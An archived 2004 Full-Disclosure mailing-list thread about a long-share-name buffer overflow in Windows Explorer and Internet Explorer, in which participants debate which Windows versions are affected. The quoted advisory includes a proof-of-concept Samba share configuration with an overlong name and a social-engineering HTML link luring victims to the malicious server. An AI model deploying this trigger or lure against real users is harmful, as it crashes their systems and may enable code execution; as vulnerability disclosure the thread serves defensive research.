[an error occurred while processing this directive]
|
|
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040426230008.29566.qmail@web12702.mail.yahoo.com>
From: dan57170 at yahoo.com (Daniel Regalado Arias)
Subject: RE: Microsoft's Explorer and Internet Explorer long share name buffer overflow.
Pues mira Gutierrez, yo tengo un servidor samba
funcionando correctamente en mi red, y efectivamente
puse un share existente y no el que propones,
obviamente con un usuario valido y de hecho en el
explorer me aparece el nombre con las 300' caracteres
A,
no me deja entrar pero tampoco truena.
Thats it!!!!!
--- Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
escribi?: > Then you probably didnt doit right, me and
others
> such as the secunia people
> (www.secunia.com) have tested this
> Vulnerability and proved that the systems are
> vulnerable. Even microsoft
> says that the vulnerability was not patched
> Until w2k sp4.
>
> I tested this vulnerability in the following full
> patched systems:
>
> Windows 98 (Vulnerable)
> Windows Me (Vulnerable)
> Windows NT (All) (Vulnerable)
> Windows 2k (All) (Vulnerable)
> Windows XP (All) (Vulnerable)
> Windows 2003 server (Not Vulnerable)
>
> Remember that if you want to test the vulnerability,
> first you must know how
> samba works. Its not just to paste the example
> Config in a smb.conf file, you must create the
> directory that is pointed in
> the share and perhaps have a valid user.
>
> Regards
>
>
> Rodrigo.-
>
>
> -----Mensaje original-----
> De: Daniel Regalado Arias
> [mailto:dan57170@...oo.com]
> Enviado el: Lunes, 26 de Abril de 2004 16:56
> Para: Rodrigo Gutierrez;
> full-disclosure@...ts.netsys.com;
> bugtraq@...urityfocus.com;
> submissions@...ketstormsecurity.org;
> info@...uriteam.com
> Asunto: Re: Microsoft's Explorer and Internet
> Explorer long share name
> buffer overflow.
>
> Well, i have tested it in W2k with sp3 and explorer
> didnt get crashed!!!!!!!
>
> Well, i cant get into the share because a message
> appears saying "share name
> not found"!!!!
>
> But, explorer is OK.
>
>
> --- Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
> escribi?: > Sunday afternoon is a bit boring, and
> weather sucks
> > down here in Santiago,
> > Chile so here we go...
> > The vuln is attached in TXT format, I would be
> gratefull if someone
> > could verify if it affects windows 2003 as well.
> >
> > Rodrigo.-
> > > Microsoft Explorer and Internet Explorer Long
> Share
> > Name Buffer Overflow.
> >
> >
> >
> > Author: Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
> >
> > Affected: MS Internet Explorer, MS Explorer
> > (explorer.exe)
> > Windows XP(All), Windows 2000(All)
> >
> > Not Tested: Windows 2003, Windows me, Windows 98,
> Windows 95
> >
> > Vendor Status: i notified the vendor in the
> beginning of 2002, this
> > vulnerability was supposed to be
> fixed in xp service
> > pack 1 according to the vendors
> knowledge base article
> > 322857.
> >
> > Vendor url:
> >
>
http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
> >
> >
> >
> > Background.
> >
> > MS Explorer (explorer.exe) and MS Internet
> > Explorer(IEXPLORE.EXE) are
> > core pieces of Microsoft Windows Operating
> Systems.
> >
> >
> >
> > Description
> >
> > Windows fails to handle long share names when
> accessing a remote file
> > servers such as samba, allowing a malicious server
> to crash the
> > clients explorer and eventually get to execute
> arbitrary code in the
> > machine as the current user (usually with
> Administrator rights in
> > windows machines).
> >
> >
> >
> > Analysis
> >
> > In order to exploit this, an attacker must be able
> to get a user to
> > connect to a malicious server which contains a
> share name equal or
> > longer than 300 characters, windows wont allow you
> to create such a
> > share, but of course samba
> > includes the feature ;). After your samba box is
> > up and running create a
> > share in you smb.conf :
> >
> >
> >
> > #------------ CUT HERE -------------
> >
> >
>
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
> > comment = Area 51
> > path = /tmp/testfolder
> > public = yes
> > writable = yes
> > printable = no
> > browseable = yes
> > write list = @trymywingchung
> >
> > #------------ CUT HERE -------------
> >
> >
> > After your server is up, just get to your windows
> test box and get to
> > the start menu > run >
> \\your.malicious.server.ip., plufff, explorer
> > will crash :).
> >
> > Social Engineering:
> >
> > <a href="\\my.malicious.server.ip">Enter My 0day
> sploit archive</a>
> >
> >
> >
> > Workaround.
> >
> > From your network card settings disable the client
> for Microsoft
> > networks until a real fix for this vulnerability
> is available.
> >
>
>
_________________________________________________________
> Do You Yahoo!?
> Informaci?n de Estados Unidos y Am?rica Latina, en
> Yahoo! Noticias.
> Vis?tanos en http://noticias.espanol.yahoo.com
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
http://lists.netsys.com/full-disclosure-charter.html
_________________________________________________________
Do You Yahoo!?
Informaci?n de Estados Unidos y Am?rica Latina, en Yahoo! Noticias.
Vis?tanos en http://noticias.espanol.yahoo.com
Powered by blists - more mailing lists